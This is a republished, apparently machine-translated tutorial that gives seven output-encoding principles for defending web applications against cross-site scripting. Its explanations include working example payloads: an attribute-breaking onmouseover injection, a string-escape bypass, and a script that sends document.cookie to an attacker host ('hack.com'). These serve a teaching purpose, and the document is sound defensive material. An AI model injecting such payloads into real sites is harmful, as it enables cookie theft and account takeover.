Seven principles for defending against XSS

Source: Internet
Author: User
Tags html comment

This article will focus on some of the principles of defending XSS attacks, requiring readers to understand XSS, at least the rationale for XSS vulnerabilities, if you are not particularly clear, refer to these two articles: "Stored and reflected XSS Attack" "DOM Based XSS "

An attacker could use an XSS vulnerability to send an attack script to the user, and the user's browser would still execute it because there was no way to know that the script was untrusted. For a browser, it considers the script to be from a server that can be trusted, so the script can access the cookie in a fair way, or keep sensitive information that is used by the current site in the browser, and even know what software is installed on the user's computer. These scripts can also overwrite HTML pages for phishing attacks.

Although there are various reasons for XSS vulnerabilities, the exploitation of exploits is full of patterns, but if we follow the defensive principles mentioned in this article, we can still prevent XSS attacks from happening.

One might ask that the core of defending XSS is not coding when it is outputting untrusted data, and that today's popular web frameworks, such as rails, are mostly HTML-encoded by default on untrusted data, to help us defend ourselves, And do we have to spend time with ourselves on how to defend against XSS? The answer is yes, for the non-trusted data that will be placed in the body of the HTML page, HTML encoding is sufficient to protect against XSS attacks, and even the HTML-encoded data into the HTML tag (tag) attribute (attribute) does not produce XSS vulnerabilities (but only if they all use quotes correctly), but if you put HTML-encoded data anywhere in the <SCRIPT> tag, even in the event-handling properties of the HTML tag (such as onmouseover), or in CSS, URL, an XSS attack still occurs, in which case the HTML encoding does not work. So even if you use HTML encoding everywhere, XSS vulnerabilities can still exist. Here are a few rules that will tell you how to use the correct coding to eliminate XSS vulnerabilities in the right place .

Principle 1: Do not insert any non-trusted data into the page unless these numbers have been coded according to the following principles

The first principle is the "Secure by Default" principle: Do not insert any non-trusted data into an HTML page unless the data has been encoded according to the following principles.

There is such a principle exists, because there are too many places in HTML prone to the formation of XSS vulnerability, and the reasons for the formation of loopholes are different, such as some of the vulnerabilities occurred in the HTML tag, some of the properties of the HTML tag, as well as in the page's <Script>, Even some appear in the CSS, and the different browsers on the page parsing is more or less different, so that some loopholes only in a specific browser will be generated. If you want to escape or replace untrusted data with an XSS filter, the filtering rules for the XSS filter will become unusually complex, difficult to maintain, and risk of being bypassed.

So I can not think of any reason to insert the non-trusted data directly into the HTML page, there is an XSS filter to help you filter, the risk of generating XSS vulnerability is still very high.

<script>, ..... Do not insert the non-trusted data directly into the script tag ...</script> directly <!– ... Do not insert the non-trusted data directly here ...–>

Insert INTO HTML comment

<div do not insert the non-trusted data directly here = "..." ></div>

Insert into the property name of the HTML tag

<div name= "... Do not insert the non-trusted data directly here ... "></div>

Insert into the attribute value of the HTML tag

< do not insert the non-trusted data href= "..." Directly here ></a>

As the name of the HTML tag

<style>, ..... Do not insert the non-trusted data directly here ...</style>

Insert directly into CSS

Most importantly, do not introduce any untrusted third-party JavaScript into the page, and once introduced, these scripts will be able to manipulate your HTML pages, steal sensitive information or launch phishing attacks, and so on.

Principle 2: HTML entity encoding of untrusted data when it is inserted between HTML tags

It is quite important here to insert the non-trusted data between the HTML tags in order to distinguish it from the HTML tag attribute section , because the two require different types of encoding. When you do need to insert untrusted data between HTML tags, the first thing to do is HTML entity encoding of untrusted data. For example, we often need to div,p,td these tags into some user-submitted data, which is not credible, we need to HTML-entity encoding. Many web frameworks provide HTML entity-encoded functions, we just need to call these functions, and some web frameworks seem more "smart", like rails, which, by default, can HTML-encode all the data inserted into an HTML page. While not fully defending against XSS, it does reduce the burden on developers.

<body>, ..... HTML entity encoding before inserting non-trusted data ... </body><div> HTML entity encoding before inserting non-trusted data ... </div><p> HTML entity encoding ...</p> before inserting non-trusted data, and so on, before inserting the non-trusted data between other HTML tags

[Coding Rules]

So what exactly should HTML entity coding do? It needs to encode the following 6 special characters:

&–> &amp;

<–> &lt;

>–> &gt;

"–> &quot;

' –> & #x27;

/–> & #x2f;

There are two points that need to be specifically stated:

    • It is not recommended to encode single quotation marks (') as &apos; Because it's not a standard HTML tag
    • The slash sign (/) needs to be encoded because the slash mark is useful for closing the current HTML tag in the case of an XSS attack

It is recommended to use the ESAPI library provided by Owasp, which provides a very rigorous set of functions for various security encodings. In the current example, you can use:

String encodedcontent = Esapi.encoder (). encodeforhtml (Request.getparameter ("input"));

Principle 3: HTML attribute encoding for untrusted data when inserted into HTML attributes

This principle refers to HTML attribute encoding of the data when you are inserting the non-trusted data into the value portion of the HTML attribute (for example, width, name, Value property) (data value). It should be noted, however, that this rule does not apply when inserting data into an event-handling attribute (such as onmouseover) of an HTML tag, which should be encoded in JavaScript using the principle 4 described below.

<div attr= ... Before inserting the non-trusted data, HTML attribute encoding ...></div> attribute value part does not use quotation marks, not recommended <div attr= ' ... HTML attribute encoding before inserting non-trusted data ... ' ></div>

The attribute Value section uses single quotation marks

<div attr= "... HTML attribute encoding before inserting non-trusted data ... "></div>

The attribute Value section uses double quotation marks

[Coding Rules]

In addition to Arabic numerals and letters, all other characters are encoded, as long as the ASCII code of the character is less than 256. The format of the output after encoding is & #xHH; (In & #x开头, HH refers to the hexadecimal number that corresponds to the character, and the semicolon as The Terminator)

The coding rules are so strict because developers sometimes forget to enclose the value part of the attribute in quotation marks. If the attribute value part is not quoted, it is easy for an attacker to close the current attribute and then insert the attack script. For example, if the attribute does not use quotation marks, and the data is not strictly encoded, then a space character can close the current property. Take a look at the following attack:

Suppose the HTML code is this:

<div width= $INPUT > ... content ... </div>

An attacker could construct such an input:

X onmouseover= "Javascript:alert (/xss/)"

Finally, the final HTML code in the user's browser will look like this:

<div width=x onmouseover= "Javascript:alert (/xss/)" > ... content ... </div>

As long as the user's mouse moves to this div, it triggers an attacker to write an attack script. In this case, the script simply pops up a warning box, and there's not much harm in the way of a prank, but in a real attack, an attacker would use a more destructive script, such as the following XSS attack that steals a user's cookie:

X/> <script>var img = document.createelement ("img"); img.src = "Http://hack.com/xss.js?" + Escape ( Document.cookie);d ocument.body.appendChild (img);</script> <div

These symbols can also be used in addition to whitespace to close the current attribute:

% * +, –/;     < = > ^ | ' (anti-single quotes, IE will consider it a single quote)

You can use the functions provided by ESAPI to encode HTML attributes:

String encodedcontent = Esapi.encoder (). Encodeforhtmlattribute (Request.getparameter ("input"));

Principle 4: When you insert untrusted data into a script, the data is script-encoded

This principle is primarily for dynamically generated JavaScript code, which includes the script section as well as the event handling attributes of the HTML tags (event Handler, such as onmouseover, OnLoad, and so on). When inserting data into JavaScript code, only one thing is safe, that is, JavaScript encodes untrusted data, and only puts that data in the value part (data value) surrounded by quotes, for example:

<script>

var message = "<%= encodejavascript (@INPUT)%>";

</script>

In addition, inserting the non-trusted data anywhere else in the JavaScript code can be quite dangerous, and an attacker could easily insert the attack code.

<script>alert (' ... Before inserting non-trusted data, JavaScript encoding ... ') </script> value section uses single quote <script>x = "... JavaScript encoding before inserting non-trusted data ... "</script>

The value section uses double quotation marks

<div onmouseover= "x=" ... JavaScript encoding before inserting non-trusted data ... ' "</div>

The value part uses quotation marks, and the value part of the event handling property also uses quotation marks

It is important to note that some JavaScript functions are extremely dangerous in XSS defenses, and even JavaScript encoding of untrusted data can still produce XSS vulnerabilities, such as:

<script>

Window.setinterval (' ... Even if the untrusted data is encoded in JavaScript, there will still be an XSS vulnerability ... ');

</script>

[Coding Rules]

In addition to Arabic numerals and letters, all other characters are encoded, as long as the ASCII code of the character is less than 256. The format of the encoded output is \XHH (beginning with \x, and HH refers to the hexadecimal number corresponding to the character)

When encoding untrusted data, it is not convenient to use the backslash (\) for the simple escape of special characters, such as the double quotation mark "escaped to", this is not reliable, because the browser when parsing the page, the first HTML parsing, and then the JavaScript parsing, So double quotes are likely to be parsed as HTML characters, and double quotes can break through the value portion of the code, allowing attackers to continue with XSS attacks. For example:

Suppose the code fragment is as follows:

<script>

var message = "$VAR";

</script>

What the attacker entered was:

\”; Alert (' XSS ');//

If you simply escape the double quotes and replace them with \ ", the attacker's input will change to the final page:

<script>

var message = "\ \"; Alert (' XSS ');//";

</script>

When the browser parses, it considers that the double quotation mark after the backslash matches the first double quotation mark, and then considers that the subsequent alert (' XSS ') is a normal JavaScript script and is therefore allowed to execute.

You can use the functions provided by Esapi to encode javascript:

String encodedcontent = Esapi.encoder (). Encodeforjavascript (Request.getparameter ("input"));

Principle 5: When you insert untrusted data into the style attribute, CSS encodes the data

When you need to insert non-trusted data into the Stylesheet,style tag or style attribute, you need to encode the data in CSS. The traditional impression that CSS is only responsible for page style, but in fact it is much more powerful than we think, but also can be used for various attacks. Therefore, do not store the non-trusted data in the CSS lightly, should only allow the non-trusted data into the CSS properties of the value portion, and appropriate encoding. In addition, it is best not to put the non-trusted data into some complex attributes, such as URLs, behavior, etc., can only be known by IE expression Properties to allow the execution of JavaScript scripts, it is also not recommended to put the non-trusted data here.

<style>selector {property: ... CSS encoding before inserting non-trusted data ...} </style><style>selector {property: "... CSS encoding before inserting non-trusted data ... "} </style>

<span style= "Property: ... CSS encoding before inserting non-trusted data ... "> ... </span>

[Coding Rules]

In addition to Arabic numerals and letters, all other characters are encoded, as long as the ASCII code of the character is less than 256. The format of the output after encoding is \hh (start with \, HH refers to the hexadecimal number corresponding to the character)

With principle 2, principle 3, when the untrusted data encoding, avoid opportunistic to double quotation marks and other special characters for simple escape, attackers can find ways to circumvent such restrictions.

You can use the functions provided by ESAPI for CSS encoding:

String encodedcontent = Esapi.encoder (). ENCODEFORCSS (Request.getparameter ("input"));

Principle 6: URL encoding of untrusted data when it is inserted into the HTML URL

When you need to insert the non-trusted data into the URL of the HTML page, you need to URL encode it, as follows:

<a href= "http://www.abcd.com?param= ... URL encoding before inserting non-trusted data ... "> Link Content </a>

[Coding Rules]

In addition to Arabic numerals and letters, all other characters are encoded, as long as the ASCII code of the character is less than 256. The format of the encoded output is%hh (beginning with%, and HH is the hexadecimal number corresponding to the character)

There are two points that require special attention when encoding URLs:

1) The URL attribute should enclose the value part in quotation marks, or the attacker can easily break through the current attribute area and insert subsequent attack code.

2) do not encode the entire URL, because the untrusted data may be inserted into the href, src or other URL-based attributes, it is necessary to validate the Protocol field of the starting part of the data, otherwise the attacker can change the protocol of the URL, for example, from the HTTP protocol to the data pseudo-protocol, or JavaScript pseudo-protocol.

You can use the functions provided by ESAPI for URL encoding:

String encodedcontent = Esapi.encoder (). Encodeforurl (Request.getparameter ("input"));

ESAPI also provides some functions for detecting untrusted data, where we can use it to detect if untrusted data is really a URL:

String Userprovidedurl = Request.getparameter ("Userprovidedurl"); Boolean isvalidurl = Esapi.validator (). isValidInput ("Urlcontext", Userprovidedurl, "URL", 255, false); if (Isvalidurl) {

<a href= "<%= encoder.encodeforhtmlattribute (Userprovidedurl)%>" ></a>

}

Principle 7: Use the XSS rules engine for encoding filtering when using Rich Text

Web applications generally provide users with the ability to enter rich text information, such as BBS postings, blog posts, etc., user-submitted rich text messages often contain HTML tags, or even javascript scripts, if not properly coded filtering, it will form an XSS vulnerability. However, we cannot be afraid of creating an XSS vulnerability, so the user is not allowed to enter rich text, which can be very damaging to the user experience.

For the particularity of rich text, we can use the XSS rule engine to encode user input, only allow users to enter secure HTML tags, such as <b>, <i>, <p>, etc., to HTML-encode other data. It should be noted that after the rule Engine code filtered content can only be placed in <div>, <p> security HTML tags, do not put in the HTML tag attribute value, not to be placed in the HTML event processing properties, or put into the <SCRIPT> Tag.

Recommended XSS rule Filtering engine: OWASP Antisamp or Java HTML sanitizer

Summarize

Because of the potential for XSS vulnerabilities in many places, and the different causes of vulnerabilities in each place, for the defense of XSS, we need to do the right thing in the right place , where the non-trusted data is to be placed in the appropriate code, such as in < When div> tags, HTML encoding is required, and HTML attributes are encoded in the <div> tag properties, and so on.

XSS attacks are evolving, and some of the principles described above cover almost all of the potential XSS in Web applications, but we still can't take it lightly, and in order to make Web applications more secure, we can also combine other defenses to enhance the effectiveness of XSS defenses or mitigate losses:

    • validation of data legitimacy for user input , such as entering email text box only allows the input of the correct format of the email, enter the mobile phone number of the text box is only allowed to fill in the numbers and the format needs to be correct. This type of legitimacy validation needs to be done at least on the server side to prevent browser-side validation from being bypassed, and, in order to improve the user experience and relieve server pressure, it is best to do the same on the browser side.
    • Add a HttpOnly tag to the cookie . The goal of many XSS attacks is to steal user cookies, which often contain user authentication information (such as SessionID), and once stolen, hackers can impersonate a user to steal a user's account. Stealing cookies generally relies on JavaScript to read cookie information, while the HttpOnly tag tells the browser that the cookie on the tag is not allowed to be read or modified by any script, even if the Web application generates an XSS vulnerability, Cookie information can also be better protected to reduce the loss of the purpose.

Web applications are becoming more complex and increasingly prone to vulnerabilities, not just XSS vulnerabilities, and no silver bullet can solve all security problems at once, and we can only pay attention to the various security vulnerabilities for targeted defense.

Seven principles for defending against XSS

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.